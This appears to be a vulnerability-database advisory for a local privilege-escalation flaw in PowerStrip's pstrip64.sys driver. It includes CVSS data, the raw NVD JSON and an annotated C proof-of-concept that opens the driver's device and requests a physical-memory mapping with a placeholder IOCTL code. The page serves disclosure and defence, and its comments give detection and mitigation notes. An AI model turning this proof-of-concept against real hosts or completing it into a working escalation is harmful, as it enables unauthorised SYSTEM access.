Security Vulnerability Report
CVE-2026-29923 CVSS 7.8 HIGH

CVE-2026-29923

Published: 2026-04-09 20:16:25
Last Modified: 2026-04-14 17:16:49

Description

The pstrip64.sys driver in EnTech Taiwan PowerStrip <=3.90.736 allows local users to escalate privileges to SYSTEM via a crafted IOCTL request enabling unprivileged users to map arbitrary physical memory into their address space and modify critical kernel structures.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

EnTech Taiwan PowerStrip <= 3.90.736

PoC / Exploit Code

⚠ For Security Research Only
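The following code is for security research and authorized testing only. The listing's own comment marks its IOCTL control code as a placeholder, so read it as an illustration of the bug class, not as a verified reproduction of the issue.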
c
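/*
 * Illustrative listing for CVE-2026-29923 (pstrip64.sys, EnTech Taiwan
 * PowerStrip <= 3.90.736).
 *
 * What it shows: a user-mode process opens the driver's device object and
 * sends one DeviceIoControl request asking for a physical-memory mapping.
 * The advisory's claim is that the driver serves such a request for an
 * unprivileged caller, which is the privilege-management failure (CWE-269)
 * behind the SYSTEM escalation.
 *
 * What it does not establish: the control code below is a placeholder and
 * the request layout is not confirmed anywhere on this page, so a failed
 * IOCTL here says nothing about whether a host is affected.
 *
 * Defender notes:
 *   - Exposure is the presence of the driver, not of this program. Inventory
 *     hosts for pstrip64.sys and remove it or block it from loading with
 *     application-control / driver block policy.
 *   - Useful telemetry: driver-load events naming pstrip64.sys, and handles
 *     to the \\.\PStrip64 device opened by processes that are not elevated.
 *   - On the driver side the fix class is a restrictive security descriptor
 *     on the device object (for example via IoCreateDeviceSecure) and not
 *     exposing raw physical-memory mapping to callers at all.
 */
#include <windows.h>
#include <stdio.h>

#define DEVICE_NAME "\\\\.\\PStrip64"

/*
 * Placeholder, per the original listing ("IOCTL code may vary").
 * 0x222003 decodes as CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_NEITHER,
 * FILE_ANY_ACCESS), i.e. the generic first custom function number, which is
 * consistent with it being a stand-in and not a value taken from the driver.
 */
#define IOCTL_MAP_PHYSICAL_MEMORY 0x222003

/* Assumed request layout; nothing on the page confirms the driver's real one. */
typedef struct _PHYSICAL_MEMORY_RANGE {
    UINT64 PhysicalAddress;
    SIZE_T Size;
} PHYSICAL_MEMORY_RANGE, *PPHYSICAL_MEMORY_RANGE;

/*
 * Opens the device, issues the single mapping request and reports the result.
 * Returns 1 if the device cannot be opened, 0 otherwise (including when the
 * IOCTL itself fails).
 */
int main(void)
{
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    DWORD bytesReturned = 0;
    /* Zero-initialised so no uninitialised stack bytes are handed to the driver. */
    PHYSICAL_MEMORY_RANGE inputBuffer = {0};
    PVOID mappedAddress = NULL;
    BOOL result;

    printf("[*] Attempting to open device %s...\n", DEVICE_NAME);

    hDevice = CreateFileA(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE) {
        /* GetLastError() returns a DWORD (unsigned long), so %lu, not %d. */
        printf("[-] Failed to open device. Error: %lu\n", GetLastError());
        return 1;
    }

    /*
     * Reaching this point from a standard-user process already shows that the
     * device object accepts handles from unprivileged callers.
     */
    printf("[+] Device opened successfully.\n");

    /* 0x1000 / 0x1000 are the page's example values, not a meaningful target. */
    inputBuffer.PhysicalAddress = 0x1000;
    inputBuffer.Size = 0x1000;

    printf("[*] Sending IOCTL to map physical memory at 0x%llx...\n",
           (unsigned long long)inputBuffer.PhysicalAddress);

    result = DeviceIoControl(
        hDevice,
        IOCTL_MAP_PHYSICAL_MEMORY,
        &inputBuffer,
        sizeof(inputBuffer),
        &mappedAddress,
        sizeof(mappedAddress),
        &bytesReturned,
        NULL
    );

    if (result) {
        /*
         * A returned mapping is the vulnerable condition the advisory
         * describes. The listing stops here: nothing is read or written
         * through the pointer, and the mapping is not released because the
         * page gives no request for doing so.
         */
        printf("[+] IOCTL successful! Memory mapped at: 0x%p\n", mappedAddress);
    } else {
        printf("[-] IOCTL failed. Error: %lu\n", GetLastError());
    }

    CloseHandle(hDevice);
    return 0;
}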

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29923", "sourceIdentifier": "[email protected]", "published": "2026-04-09T20:16:24.693", "lastModified": "2026-04-14T17:16:48.907", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The pstrip64.sys driver in EnTech Taiwan PowerStrip <=3.90.736 allows local users to escalate privileges to SYSTEM via a crafted IOCTL request enabling unprivileged users to map arbitrary physical memory into their address space and modify critical kernel structures."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://entechtaiwan.com/util/ps.shtm", "source": "[email protected]"}, {"url": "https://packetstorm.news/files/id/218394/", "source": "[email protected]"}, {"url": "https://packetstorm.news/files/id/218394/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}